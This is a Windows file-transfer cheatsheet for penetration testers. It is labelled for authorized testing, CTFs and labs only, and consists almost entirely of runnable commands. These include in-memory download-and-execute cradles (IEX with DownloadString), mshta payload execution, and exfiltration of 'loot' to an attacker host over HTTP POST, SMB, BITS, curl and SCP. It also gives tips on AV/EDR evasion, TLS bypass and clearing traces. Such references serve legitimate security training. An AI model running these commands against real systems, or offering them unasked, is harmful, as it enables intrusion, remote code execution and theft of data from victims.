Windows File Transfer Cheatsheet
Default Ports: SMB 445/tcp · HTTP 80/tcp · FTP 21/tcp · WinRM 5985/5986
“Download” = pulling a file onto the Windows target. “Upload” = exfiltrating off it. For authorized testing, CTFs, and lab use only.
PowerShell — Download
# Download to disk
Invoke-WebRequest -Uri http://10.10.14.5/file.exe -OutFile C:\Windows\Temp\file.exe
iwr http://10.10.14.5/file.exe -OutFile file.exe # alias
# Legacy / faster (no progress bar overhead)
(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\Temp\file.exe')
# Fileless — execute in memory, nothing touches disk
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5/script.ps1')
(New-Object Net.WebClient).DownloadString('http://10.10.14.5/s.ps1') | IEX
iex (iwr http://10.10.14.5/s.ps1 -UseBasicParsing)
If Invoke-WebRequest hangs, add -UseBasicParsing (no IE engine dependency).
Bypassing common blockers
# Ignore TLS cert errors
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
# Force TLS 1.2 (older hosts)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Use a proxy / system creds
$wc = New-Object Net.WebClient
$wc.Proxy = [Net.WebRequest]::GetSystemWebProxy()
$wc.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
$wc.DownloadFile('http://10.10.14.5/f.exe','f.exe')
PowerShell — Upload (Exfil)
# POST a file to a listener that accepts uploads
Invoke-WebRequest -Uri http://10.10.14.5/upload -Method POST -InFile C:\loot.zip
# Base64 a file, exfil the string, decode on attacker side
$b64 = [Convert]::ToBase64String((Get-Content -Path 'C:\loot.txt' -Encoding Byte))
# (paste $b64 -> attacker: base64 -d > loot.txt)
Quick attacker-side upload server (Python):
# pip install uploadserver
python3 -m uploadserver 80 # serves + accepts POST /upload
SMB Transfers
Attacker — spin up a share with Impacket:
# Anonymous share named "share" pointing at current dir
impacket-smbserver share $(pwd) -smb2support
# With auth (needed for modern Windows that refuses guest)
impacket-smbserver share $(pwd) -smb2support -user user -password pass
Windows — pull / push:
copy \\10.10.14.5\share\file.exe C:\Temp\file.exe :: download
copy C:\loot.zip \\10.10.14.5\share\loot.zip :: upload
:: Map a drive (use creds if required)
net use Z: \\10.10.14.5\share /user:user pass
copy Z:\file.exe .
net use Z: /delete
Copy-Item \\10.10.14.5\share\file.exe C:\Temp\file.exe
If SMB egress (445) is blocked outbound, host the Impacket share on a non-standard port:
-port 445is default; some setups proxy it.
certutil (LOLBIN)
certutil -urlcache -split -f http://10.10.14.5/file.exe file.exe
certutil -urlcache -f http://10.10.14.5/file.exe C:\Temp\file.exe
:: Base64 encode/decode local files
certutil -encode input.bin out.b64
certutil -decode out.b64 output.bin
Heavily signatured by AV/EDR — expect detection. Clear the cache afterward: certutil -urlcache * delete.
bitsadmin / BITS
bitsadmin /transfer job /download /priority high http://10.10.14.5/file.exe C:\Temp\file.exe
Import-Module BitsTransfer
Start-BitsTransfer -Source http://10.10.14.5/file.exe -Destination C:\Temp\file.exe
# Upload
Start-BitsTransfer -Source C:\loot.zip -Destination http://10.10.14.5/loot.zip -TransferType Upload
BITS survives reboots and runs as a background service — stealthier than a raw WebClient.
Other LOLBINs
:: curl (built in on Windows 10 1803+ / Server 2019+)
curl http://10.10.14.5/file.exe -o file.exe
curl -X POST -F file=@C:\loot.zip http://10.10.14.5/upload
:: wget alias is NOT real wget in PowerShell — it maps to Invoke-WebRequest
:: Download a remote-signed cradle via mshta / regsvr32 / etc. (execution, not just transfer)
mshta http://10.10.14.5/payload.hta
FTP
Attacker — run a quick FTP server:
python3 -m pyftpdlib -p 21 -w # -w allows anonymous write (upload)
Windows — non-interactive via a script file (handles no-interactive shells):
echo open 10.10.14.5> ftp.txt
echo anonymous>> ftp.txt
echo password>> ftp.txt
echo binary>> ftp.txt
echo get file.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
SCP / SSH
If OpenSSH client is present (default on Win10 1809+):
scp [email protected]:/tmp/file.exe C:\Temp\file.exe :: download
scp C:\loot.zip [email protected]:/tmp/ :: upload
Encode / Decode (no network)
When you only have a shell and no transfer channel, paste hex/base64:
# Attacker: base64 the file, then on target:
$b64 = "TVqQAAMA..." # paste here
[IO.File]::WriteAllBytes("C:\Temp\file.exe",[Convert]::FromBase64String($b64))
:: certutil round-trip (see above) also works for binary-safe paste transfers
Quick Decision Guide
| Situation | Best option |
|---|---|
| Modern host, outbound 80 open | iwr / Invoke-WebRequest |
| Need fileless execution | IEX (New-Object Net.WebClient).DownloadString(...) |
| AV blocking PowerShell web | SMB via impacket-smbserver |
Only cmd.exe, no PS |
certutil or bitsadmin |
| Win10 1803+/2019+ | curl.exe |
| No network egress at all | base64 paste + [Convert]::FromBase64String |
| Exfil data out | uploadserver + POST, or base64 paste-back |
Attacker-Side Listeners (quick reference)
python3 -m http.server 80 # serve files (download only)
python3 -m uploadserver 80 # serve + accept uploads
impacket-smbserver share $(pwd) -smb2support
python3 -m pyftpdlib -p 21 -w # FTP with write